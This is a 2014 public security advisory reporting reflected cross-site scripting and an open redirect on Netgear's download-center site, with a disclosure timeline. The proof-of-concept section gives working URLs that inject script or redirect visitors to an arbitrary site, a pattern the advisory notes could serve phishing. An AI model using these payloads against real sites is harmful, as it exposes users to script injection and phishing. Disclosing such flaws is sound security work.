downloadcenter.netgear.com suffers from cross site scripting and open redirection vulnerabilities.
60a82711956e8b58fd95979ae9a77382e6d217c936db9096da12b031ae315d28
######################
# Exploit Title : downloadcenter.netgear.com XSS/Open redirection vulnerabilities.
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://www.netgear.com
# Date : 2014-07-19
# Tested on : Windows 7 / Mozilla Firefox
Windows 7 / Chrome
Linux / Mozilla Firefox
######################
# Descritpion:
The website " downloadcenter.netgear.com " suffers from cross site scripting and open redirection vulnerabilities.
######################
# PoC Exploit:
Redirection to any (phishing?) site:
1) Connect to url: http://downloadcenter.netgear.com/en/Disclaimer.aspx?redirecturl=http://www.homelab.it
2) Click on "Download" button
XSS Reflected:
1) Connect to url: http://downloadcenter.netgear.com/en/Disclaimer.aspx?redirecturl=javascript://www.xss.com?xss=%250aalert%2528/XSS/%2529
2) Click on "Download" button
# PoC video is available at:
https://www.youtube.com/watch?v=JCDDk_0_mQ8
######################
# Vulnerability Disclosure Timeline:
2014-07-19: Discovered vulnerability
2014-07-19: Vendor Notification
2014-08-01: No Vendor Response/Feedback
2014-08-14: Vendor Notification
2014-09-19: No Vendor Response/Feedback
2014-09-19: Public Disclosure
######################
Discovered By : Claudio Viviani
http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
#####################